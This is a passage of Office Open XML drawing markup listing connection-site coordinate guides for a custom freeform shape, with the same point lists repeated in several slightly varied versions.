              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1613814"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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64331 h 1613814"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1613814"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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07503 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1553819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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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31938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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44830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1359160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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1359160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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1140893 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1550752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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1359160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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1140893 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1550752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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2336160 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1408750 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1359160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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1140893 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1550752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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2366989 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1420754 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1359160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75980 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 267262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098594 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 73185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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1140893 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1550752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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1613814"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1613814"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1613814"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1613814"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1613814"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1613814"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1613814"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1613814"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1613814"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1613814"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1613814"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1613814"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1613814"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1613814"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1613814"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1613814"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1613814"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1613814"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1613814"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1613814"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1613814"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1613814"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1613814"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1613814"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1613814"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1613814"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1613814"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1613814"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1613814"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1613814"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1613814"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1613814"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1613814"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1613814"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1613814"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1613814"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1613814"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1613814"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1613814"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1613814"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1613814"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1613814"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1613814"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1613814"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1140893 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1550752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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1613814"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1613814"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1613814"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1613814"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1613814"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1613814"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1613814"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1613814"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1613814"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1613814"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1613814"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1613814"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1613814"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1613814"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1613814"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1613814"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1613814"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1613814"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1613814"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1613814"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1613814"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1613814"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1613814"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1613814"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1613814"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1613814"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1613814"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1613814"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1613814"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1613814"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1613814"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1613814"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1613814"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1613814"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1613814"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1613814"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1613814"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1613814"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1613814"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1613814"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1613814"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1613814"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1613814"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1613814"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1613814"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61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032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1613814"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631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53639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1613814"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1613814"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1613814"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1613814"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1613814"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1613814"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1613814"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1613814"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1613814"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1613814"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1613814"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1613814"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1613814"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1613814"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1613814"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1613814"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1613814"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1613814"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1613814"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1613814"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1613814"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1613814"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1613814"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1613814"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1613814"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1613814"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1613814"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1613814"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1613814"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1613814"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1613814"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1613814"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1613814"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1613814"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1613814"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1613814"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1613814"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1613814"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1613814"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1613814"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1613814"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1613814"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
